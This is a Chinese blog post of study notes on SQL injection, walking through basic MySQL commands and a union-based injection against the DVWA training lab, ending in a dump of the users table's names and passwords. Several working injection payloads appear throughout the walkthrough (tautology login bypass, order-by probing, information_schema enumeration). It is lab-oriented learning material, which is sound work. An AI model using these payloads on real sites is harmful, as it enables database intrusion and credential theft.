数据库语句+DVWA联合查询

最新推荐文章于 2024-04-19 20:49:57 发布
最新推荐文章于 2024-04-19 20:49:57 发布
阅读量892 收藏 5
点赞数
分类专栏: 笔记 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44891093/article/details/114275981
版权

数据库语句+联合查询

数据库语句+联合查询

sql注入概念

万能密码---->数据库交互:sql注入
将用户输入的内容和源码拼通
功能:能读取并写入数据库中所有数据
单引号闭合,or条件不会报错,and错误无法通过 admin’#
#号代表注释,用户名正确则通过

什么是sql注入?
SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,他可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

按照数据提交的方式来分类

  • 1.Get注入:
    更快
    只有1个数据包,提交后不安全可直接看到路径。
  • 2.Post注入 :
    更安全
    数据包数量更多,分批发送,可看数据包路径。
    sql注入可能存在的包头
    Referer头:数据包来源头
    http头:用户通过什么访问 更改方式:
    1.手动将Get改为Post
    2.右键—>改变请求的方式
  • 3.Cookie注入
    将浏览记录保存,保存浏览值,在下一次登录时可直接访问。

按照注入点类型来分类

1.数字型注入点
2.字符型注入点
3.搜索型注入点

Mysql数据库

sql中最重要的语句

CREATE DATABASE
##创建新数据库
ALTER DATABASE
##修改数据库
CREATE TABLE
##创建新表
ALTER TABLE
##变更(改变)数据库表
DROP TABLE
##删除表
CREATE INDEX
##创建索引(搜索键)
DROP INDEX
##删除索引

SELECT
##从数据库表中获取数据
UPDATE
##更新数据库表中的数据
DELETE
##从数据库表中删除数据
INSERT INTO
##向数据库表中插入数据

如何连接并启动mysql?

cd phpStudy\PHPTutorial\MySQL\bin\mysql.exe -u root -p
##直接回车密码 
##进入数据库

在这里插入图片描述

show databases  
;
##查看当前数据库的所有库名

在这里插入图片描述

use dvwa; ##使用数据库

在这里插入图片描述

show tables; ##查看dvwa库的所有的表
desc users;  ##查看表结构
select * from users; ##查看所有的列及数据

在这里插入图片描述

select user,password ftom users; ##查看特定的列
select user,password ftom users where user=admin;##查看指定行

在这里插入图片描述

Sql注入的流程

1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示位置
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据

联合查询

实验环境:
DVWA

view source 
##查看源码
##最多只能查看5个值

sql注入 ’ ##字符型

1' or '1'='1 
##恒成立,万能拼接进去,显示五个账号

1' union select 1,2# ##union联合查询
##1数据
##2数据
##1,2数据修改,对应显示位置的改变

1’and ’1’=’2

在这里插入图片描述

1’or ’1234’=’1234

在这里插入图片描述

1’order by 1 #

在这里插入图片描述

1' union select 1,2# ##union联合查询
##1数据
##2数据
##1,2数据修改,对应显示位置的改变

在这里插入图片描述

1' union select version(),database()#
##得知显示位置和库名

1' union select1,group_concat(table_name) from  information_schema.tables where table_schema=database() #
##指定库查询筛选的表名

在这里插入图片描述
在这里插入图片描述

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
##指定库查询users表的所有列

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1'union select user,password from users# ##查询数据

即改即提交,无需一改一抓包再显示
删除字符型中的单引号即可更改为数字型
不识别,需要转码
在这里插入图片描述
在这里插入图片描述

芝芝又荔枝
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA的部署和教程
lifanxin的博客
05-04 5920
DVWA的部署概述本地部署DVWA部署DVWA的基本环境下载DVWA配置MySql数据库配置DVWA总结 概述   DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 本地部署DVWA 部署DVWA的基本环境   dvwa本质也是一个web应用服务,所以可以使用下面的web应用服务组合来进行环境部署 – Apach
SQL学习之路--DVWA等级LOW
m0_69555575的博客
06-17 512
一名想进入安全行业的普通青年
DVWA之暴力破解二(手动注入和使用sqlmap)
cai_huaer的博客
04-19 897
因为之前我们是登录进来,所以有一个cookie,现在我们之间用url去请求,没有附带cookie,所以这时是需要重新回到登录页面的。再回到之前的源代码那,可以看到,密码是md5加密后再存的,所以在网上搜索md5解密,把爆破出来的密码成功还原。然后我们分析,user变量是用单引号‘去识别的,那我们在输入的时候,自己加入’后再加入一些其他的内容是不是也可以。后台数据库是MySQL,然后有两个数据库,一个是information_schema,一个是dvwa。3.接着,我们继续注入,爆破所有的数据库
DVWA[SQL-Injection(Blind)]学习记录
nareku的博客
07-05 353
一天肝一个注入有点上头随便注注 输入1 输入 1’ 再试试 1’’ 注到这差不多知道是字符型注入了,但是因为页面值返回了这个id是否在数据库里面,并没有返回数据库里面的数据,这个时候就不能使用联合查询注入了,所以使用布尔注入来解题先来判断一下数据库库名的长度 结合题目场景,输入查询语句: 回显: 再试试: 回显: 说明数据库的库名长度是4数据库库名的范围一般在A-Z, a-z之内,可能还会有其他的一些特殊字符 输入查询语句:(因为在之前的练习早就知道数据库的库名是‘dvwa’,所以就不一一试试了
SQL注入作业
最新发布
在这里,你可以了解到关于C++,数据结构,Linux等知识点
04-19 1131
实际上这个过程是,admin'# 作为用户名登录后,数据库对该用户名,密码信任,实际上这个用户名被代码替换后,登录的不是admin'# ,而是admin。修改的是admin的密码,这就是二阶注入的原理。所谓的二阶注入,利用的是,数据库系统对已有信息的“信任”,将注入的用户名输入到系统后,利用这种信任,登录到数据库其他用户,比如admin'#成功注册后,但是登录的却是admin。此时,username为8 ,根据or的运算,3=3是永真式,#将后半句注释了,故这句代码执行结果永远为真,可以登录成功。
dvwaSQL
m0_57379855的博客
10-14 182
SQL InjectionSQL手工注入思路SQL Injectionlow等级medium等级High等级Impossible等级 SQL手工注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库的表 6.获取表的字段名 SQL Injection low等级 1.判断是否存在注入,注入是字符型还是数字型 输入1 查询成功,输入永真式,1’ or ‘1’='1 查询成功,输入永假式,1’ a
DVWA数据库user表内所有信息以及Sqlmap爆破DVWA数据库信息
weixin_48182463的博客
08-28 622
输入sqlmap.py -r dvwa.txt --dump "user" -T "users" -D "DVWA" (-T数据库,-D表名,-C列)sqlmappy -r xxx.txt --dump -C “ user” -T “users” -D “DVWA 下载列。“sqlmappy -r xxx.txt --dump -T “ users”-D“DVWA“ 下载表。sq.mappy -r 1.txt --dump -D “ DVWA“ 下载列。-- - / -- + / # 都是属于注释;
pikachu + dvwa
09-22
而phpMyAdmin是一个流行的MySQL数据库管理工具,通常与Web应用的数据库管理有关,可能被包含在这个靶场环境,以便用户管理DVWA或Pikachu的数据。 总的来说,这个压缩包提供了丰富的学习资源,涵盖了网络安全的...
pikachu+dvwa+sqli.zip
09-08
标题的“pikachu+dvwa+sqli.zip”是一个压缩包文件,包含了三个与网络安全相关的靶场资源。这些靶场通常用于网络安全教育、渗透测试训练或漏洞检测实践,帮助用户了解和学习如何发现并利用SQL注入(SQL Injection...
网安+安全工具安装+dvwa安装.pdf
11-22
网安+安全工具安装+dvwa安装.pdf
爆破dvwa网站的的数据库
08-28
利用dvwa网站的id漏洞爆破数据库dvwa
DVWA+XAMPP.zip
06-07
DVWA原始下载地址:https://github.com/ethicalhack3r/DVWA/archive/v1.9.zip XAMPP原始下载地址:https://jaist.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.4.6/xampp-linux-x64-7.4.6-0-installer.run
DVWA (SQL injection)
m0_55563900的博客
02-28 401
DVWA (SQL injection) 先输入 1 ,查看回显 (URL ID=1,说明 php 页面通过 get 方法传递参数) 查看字段 输入 1’ order by 1# 和 1’ order by 2# 时都返回正常: 当输入 1’ order by 3#时 出现错误 由此可知,users 表只有两个字段,数据为两列 接下来使用union select获取信息 输入 1’ union select database(),user()# database()将会返回当前网站所使用的数据
浅谈SQL注入的-1‘ union select 1,2,3#
qq_23667585的博客
10-09 7964
超详细的介绍了SQL注入语句的 -1' union select 1,2,3# 的含义
SQL获取所有数据库名、表名、储存过程以及参数列表
纯的专栏
12-06 458
1:获取当前数据库的所有用户表 select Name from sysobjects where xtype='u' and status>=0 2:获取某一个表的所有字段 select name from syscolumns where id=object_id('表名') 3:查询用户创建的所有数据库 select * from master..sysdatabases D w
DVWA靶场下的sql注入之文件读写
waxcj的博客
05-09 1278
DVWA的安装配置在我上一篇文章上写过了,不知道的可以去看看,这里直接讲sql注入如何获得文件读写权限 sql注入读写的根本条件 1:数据库用户得是高权限用户(root) 2:数据库下的secure_file_priv不是null(如果是也可以通过其他方法读取和写入,后文会讲,可以在MySQL命令行用这条语句查看secure_file_priv是否为null SHOW VARIABLES LIKE "secure_file_priv"; 如果为null,我们可以在D:/phpstudy/.
DVWA】SQL Injection
xxxxxxx45678的博客
11-08 565
SQL注入学习
DVWA靶场在sql注入联合查询时返回报错信息 “Illegal mix of collations for operation ‘UNION’ ”之解决
AlienEowynWan的博客
11-17 2150
这是由于union连接数据库的字段的字符规则不一样导致的错误,我们修改一致就可以了
DVWA平台手动SQL注入并查询数据库信息以及用户密码(Low级别)
qq_725話的博客
04-07 3568
三、基本技能实验结果与分析: 1.将安全级别设置为low: 2.进入dvwa的SQL Injection界面: 在文本框里面输入id=1;此时在url显示出了?id=1,数据库的信息显示到页面上了,有回显。 3. 在url提交id=1’ 页面报错;如图 4. 将后面的语句通过#注释掉,此时页面正常显示 5. 我们可以知道漏洞参数是:id我们要进行的是 “字符型漏洞” 注入。以上信息确定...
xampp+dvwa
09-09
XAMPP是一个易于安装且包含Mysql、PHP和Perl的Apache发行版,而DVWA是一...下载完成后,可以将压缩包解压到xampp文件夹路径下的htdocs文件夹里,并将文件夹改名为dvwa,这样方便后续访问DVWA平台时使用此文件夹的名称。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值